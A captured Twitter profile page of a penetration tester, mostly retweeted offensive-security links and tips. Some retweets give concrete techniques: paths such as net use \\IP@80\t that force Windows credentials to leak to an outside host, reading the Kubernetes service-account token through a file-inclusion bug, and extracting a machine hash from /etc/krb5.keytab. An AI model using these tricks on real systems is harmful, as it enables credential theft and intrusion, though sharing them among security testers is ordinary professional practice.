Twitter | Search | |
Ahmed Sherif
Security Consultant | Deloitter | L0v3 H4ck3ng | reveals mysterious world | Penetration Tester
349
Tweets
787
Following
699
Followers
Tweets
Ahmed Sherif retweeted
Florian Hansemann May 18
Windows Privilege Escalation Guide
Reply Retweet Like
Ahmed Sherif retweeted
V Apr 30
Did know that u can steal by changing port to bypass sec-things: net use \\1.2.3.4@80\t or pdf : /F (\\\\IP@80\\t) or dubdoc : ///IP@80/t or doc: Target="file://IP@80/t.dotx" or lnk: URL=file://IP@80/t.htm or: IconFile=\\IP@80\t.ico cc
Reply Retweet Like
Ahmed Sherif Apr 29
Replying to @ippsec @SpecterOps
You were in the class last week ? If so, how come I did not meet you :) ?
Reply Retweet Like
Ahmed Sherif retweeted
defsecnsattack Mar 30
All your creds are belong to us: Hacking an ISP for fun and internet
Reply Retweet Like
Ahmed Sherif retweeted
Muhammed M.Bassem Mar 20
[Guide-Lines] Build your Red Teaming Infrastructure
Reply Retweet Like
Ahmed Sherif retweeted
Dirk-jan Mar 17
Since everyone loves dumping credentials, I've put together a tool for remotely dumping Azure AD Connect credentials for my talk. Uses only SMB and RPC calls, no code exec on the target host 😁
Reply Retweet Like
Ahmed Sherif Feb 26
Replying to @offsectraining
Did you try harder :p ?
Reply Retweet Like
Ahmed Sherif retweeted
intigriti Feb 21
WRITEUP: "Abusing autoresponders and email bounces", by .
Reply Retweet Like
Ahmed Sherif retweeted
Kevin Murphy Feb 14
Got a root shell on a domain-joined Linux box? Stumbled on this PS script yesterday. Run this against /etc/krb5.keytab to extract the machine hash and authenticate to AD and run your favorite enum tools :)
Reply Retweet Like
Ahmed Sherif retweeted
jckhmr Feb 9
Upgrading simple shells to fully interactive TTYs
Reply Retweet Like
Ahmed Sherif retweeted
Emad Shanab Feb 10
Gorsair - A penetration testing tool for discovering and remotely accessing Docker APIs from vulnerable Docker containers. CC Demo:- Download:-
Reply Retweet Like
Ahmed Sherif Jan 12
iOS pentesting parts
Reply Retweet Like
Ahmed Sherif retweeted
Warren Levin Dec 27
Oh, and my gift for end of year, another complete challenge exploit write-up, it's been a while. challenge with ASLR/PIE/NX/Partial RELRO : . Enjoy :) .
Reply Retweet Like
Ahmed Sherif retweeted
intigriti Dec 27
Did you know you can smuggle payloads in a valid e-mail address using round brackets? Thanks for the tip, !
Reply Retweet Like
Ahmed Sherif Dec 26
Replying to @Yassineaboukir
Enjoy!
Reply Retweet Like
Ahmed Sherif Dec 14
Replying to @Jhaddix
Interesting!
Reply Retweet Like
Ahmed Sherif retweeted
Random Robbie Dec 10
- If you find a LFI ignore /etc/passwd and go for /var/run/secrets/kubernetes.io/serviceaccount this will raise the severity when you hand them a kubernetes token or cert.
Reply Retweet Like
Ahmed Sherif Dec 5
is recognizing me as a banana!
Reply Retweet Like
Ahmed Sherif retweeted
Arif Khan Nov 23
Reply Retweet Like
Ahmed Sherif Nov 23
Replying to @cyb3rops @shodanhq
Would it be forever or $5 every month?
Reply Retweet Like